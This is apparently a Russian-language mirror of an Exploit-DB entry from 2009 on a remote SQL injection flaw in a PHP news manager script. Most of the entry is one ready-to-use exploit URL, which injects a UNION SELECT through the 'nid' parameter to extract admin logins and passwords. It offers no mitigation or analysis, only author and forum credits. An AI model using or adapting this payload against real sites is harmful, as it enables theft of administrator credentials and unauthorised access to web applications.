- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10874
- Проверка EDB
-
- Пройдено
- Автор
- HUSSIN X
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-12-31
Код:
# NEWS MANAGER (nid) Remote SQL Injection Vulnerability
# Author: Hussin X
# Home : www.iq-ty.com<http://www.iq-ty.com>
# email: darkangel_g85[at]Yahoo[DoT]com
#
# Vendor : http://www.preprojects.com/news.asp
Exploit:
server/Script/news_detail.php?nid=-136+union+select+1,2,concat_ws(0x3a,login,password),4,5,6,7+from+admin--
end
IQ-SecuritY FoRuM
- Источник
- www.exploit-db.com